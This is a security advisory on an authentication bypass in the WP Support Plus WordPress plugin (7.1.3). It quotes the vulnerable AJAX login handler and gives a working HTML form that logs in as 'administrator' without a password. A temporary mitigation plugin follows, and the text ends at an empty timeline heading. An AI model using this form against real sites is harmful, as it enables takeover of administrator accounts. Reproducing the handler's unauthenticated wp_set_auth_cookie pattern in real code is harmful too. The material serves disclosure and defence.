WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation

Homepage:

https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/

Description:

You can log in as any existing user without knowing the password, because the plugin calls wp_set_auth_cookie() for a caller-supplied username without performing any authentication.

File: wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php

<?php 
// The only precondition is a non-empty email field; nothing is verified against Facebook.
if($_POST['email']=='') die();

// The caller picks the username; if that account exists, its user ID is used directly.
$user_id = username_exists( $_POST['username'] );

if(!$user_id){
	$user_id=email_exists($_POST['email']);
	if(!$user_id){
		// Unknown username and email: a new subscriber account is created.
		$random_password = wp_generate_password( $length=12, $include_standard_special_chars=false );
		$user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] );
		$full_name=explode(' ', $_POST['name']);
		$firstName=(isset($full_name[0]))?$full_name[0]:'';
		$lastName=(isset($full_name[1]))?$full_name[1]:'';
		wp_update_user(
			array(
			'ID' => $user_id,
			'first_name'=>$firstName,
			'last_name'=>$lastName,
			'display_name' => $_POST['name'],
			'role' => 'subscriber'
			)
		);
	}
}

$user_info = get_userdata($user_id);

// No password, nonce, token or Facebook identity check has taken place, yet the
// request is logged in as whichever user ID was resolved above.
if ( !is_user_logged_in() ) {
	wp_set_current_user( $user_id, $user_info->user_login );
	wp_set_auth_cookie( $user_id );
	do_action( 'wp_login', $user_info->user_login );
}
?>

Proof of Concept:

Use the form below:

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Then you can go to the admin panel.
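Mitigation:

Until a fixed plugin version is installed, the vulnerable AJAX handler can be unhooked site-wide from a must-use plugin. The following is an added example, not code from the advisory or from the plugin; it assumes the plugin registers its handler on the standard wp_ajax_loginGuestFacebook / wp_ajax_nopriv_loginGuestFacebook hooks (which is how an admin-ajax.php request with action=loginGuestFacebook reaches the file above), and the function name is chosen here.

```php
<?php
/*
Plugin Name: Block loginGuestFacebook (temporary mitigation)
Description: Unhooks the WP Support Plus loginGuestFacebook AJAX handler and logs attempts.
*/

// Place this file in wp-content/mu-plugins/ so it is loaded before regular plugins.
// admin-ajax.php fires admin_init before dispatching wp_ajax_* hooks, so removing
// the callbacks here prevents the plugin's handler from running at all.
add_action( 'admin_init', 'mitigate_login_guest_facebook', 1 );

function mitigate_login_guest_facebook() {
	// Assumption: the plugin attached its handler to these two standard hook names.
	remove_all_actions( 'wp_ajax_nopriv_loginGuestFacebook' );
	remove_all_actions( 'wp_ajax_loginGuestFacebook' );

	// Record blocked attempts so an administrator can see the endpoint being probed.
	if ( isset( $_REQUEST['action'] ) && 'loginGuestFacebook' === $_REQUEST['action'] ) {
		$requested_user = isset( $_POST['username'] )
			? sanitize_user( wp_unslash( $_POST['username'] ) )
			: '';
		$client = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
		error_log( sprintf(
			'Blocked loginGuestFacebook request from %s for username "%s"',
			$client,
			$requested_user
		) );
		// With the handlers removed admin-ajax.php would answer "0"; reply explicitly instead.
		wp_die( 'This login method is disabled.', 'Forbidden', array( 'response' => 403 ) );
	}
}
```

This disables the plugin's Facebook guest login entirely, so it is a stopgap rather than a fix; the proper fix is for the handler to verify the Facebook identity server-side before any call to wp_set_auth_cookie().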

Timeline: